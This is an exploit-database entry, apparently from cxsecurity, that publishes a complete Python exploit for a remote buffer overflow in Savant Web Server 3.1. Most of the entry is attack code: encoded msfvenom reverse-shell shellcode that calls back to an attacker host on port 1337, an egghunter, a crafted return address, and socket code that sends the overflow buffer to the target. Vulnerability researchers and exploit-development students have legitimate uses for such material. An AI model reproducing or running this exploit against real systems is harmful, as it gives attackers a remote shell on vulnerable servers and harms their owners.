Savant Web Server 3.1 Remote Buffer Overflow

2023.08.03
Credit: 0xBOF90
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: Savant Web Server 3.1 - Remote Buffer Overflow (Egghunter) # Date: [30/07/2023] # Exploit Author: [0xBOF90] # Vendor Homepage: [link] # Version: [app version] (3.1) # Tested on: [Windows 10] import socket import sys try: server = b"192.168.56.102" #\x00\x0a\x0d\x25 port = 80 size = 253 # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337 EXITFUNC=thread -f py –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25" buf = b"" buf += b"\xdb\xc0\xd9\x74\x24\xf4\xbf\x57\xe2\x90\xa0\x58" buf += b"\x31\xc9\xb1\x52\x31\x78\x17\x83\xc0\x04\x03\x2f" buf += b"\xf1\x72\x55\x33\x1d\xf0\x96\xcb\xde\x95\x1f\x2e" buf += b"\xef\x95\x44\x3b\x40\x26\x0e\x69\x6d\xcd\x42\x99" buf += b"\xe6\xa3\x4a\xae\x4f\x09\xad\x81\x50\x22\x8d\x80" buf += b"\xd2\x39\xc2\x62\xea\xf1\x17\x63\x2b\xef\xda\x31" buf += b"\xe4\x7b\x48\xa5\x81\x36\x51\x4e\xd9\xd7\xd1\xb3" buf += b"\xaa\xd6\xf0\x62\xa0\x80\xd2\x85\x65\xb9\x5a\x9d" buf += b"\x6a\x84\x15\x16\x58\x72\xa4\xfe\x90\x7b\x0b\x3f" buf += b"\x1d\x8e\x55\x78\x9a\x71\x20\x70\xd8\x0c\x33\x47" buf += b"\xa2\xca\xb6\x53\x04\x98\x61\xbf\xb4\x4d\xf7\x34" buf += b"\xba\x3a\x73\x12\xdf\xbd\x50\x29\xdb\x36\x57\xfd" buf += b"\x6d\x0c\x7c\xd9\x36\xd6\x1d\x78\x93\xb9\x22\x9a" buf += b"\x7c\x65\x87\xd1\x91\x72\xba\xb8\xfd\xb7\xf7\x42" buf += b"\xfe\xdf\x80\x31\xcc\x40\x3b\xdd\x7c\x08\xe5\x1a" buf += b"\x82\x23\x51\xb4\x7d\xcc\xa2\x9d\xb9\x98\xf2\xb5" buf += b"\x68\xa1\x98\x45\x94\x74\x0e\x15\x3a\x27\xef\xc5" buf += b"\xfa\x97\x87\x0f\xf5\xc8\xb8\x30\xdf\x60\x52\xcb" buf += b"\x88\x4e\x0b\xeb\x2d\x27\x4e\x0b\xab\x8e\xc7\xed" buf += b"\xd9\xe0\x81\xa6\x75\x98\x8b\x3c\xe7\x65\x06\x39" buf += b"\x27\xed\xa5\xbe\xe6\x06\xc3\xac\x9f\xe6\x9e\x8e" buf += b"\x36\xf8\x34\xa6\xd5\x6b\xd3\x36\x93\x97\x4c\x61" buf += b"\xf4\x66\x85\xe7\xe8\xd1\x3f\x15\xf1\x84\x78\x9d" buf += b"\x2e\x75\x86\x1c\xa2\xc1\xac\x0e\x7a\xc9\xe8\x7a" buf += b"\xd2\x9c\xa6\xd4\x94\x76\x09\x8e\x4e\x24\xc3\x46" buf += b"\x16\x06\xd4\x10\x17\x43\xa2\xfc\xa6\x3a\xf3\x03" buf += b"\x06\xab\xf3\x7c\x7a\x4b\xfb\x57\x3e\x6b\x1e\x7d" buf += b"\x4b\x04\x87\x14\xf6\x49\x38\xc3\x35\x74\xbb\xe1" buf += b"\xc5\x83\xa3\x80\xc0\xc8\x63\x79\xb9\x41\x06\x7d" buf += b"\x6e\x61\x03" httpMethod = b"\x31\xC9\x85\xC9\x0F\x84\x11" + b" /" # xor ecx, ecx; test ecx, ecx; je 0x17 egghunter = b"\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53\x53" egghunter += b"\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08\x3c" egghunter += b"\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75\xd7" egghunter += b"\xff\xe7" inputBuffer = b"\x90"*10+egghunter inputBuffer += b"\x41" * (size-len(egghunter)-10) inputBuffer += b"\x74\x86\x41"#0x00418674 httpEndRequest = b"\r\n\r\n" shellcode = b"w00tw00t"+buf buf = httpMethod + inputBuffer + httpEndRequest +shellcode print("Sending evil buffer...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((server, port)) s.send(buf) s.close() print("Done!") except socket.error: print("Could not connect!")


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top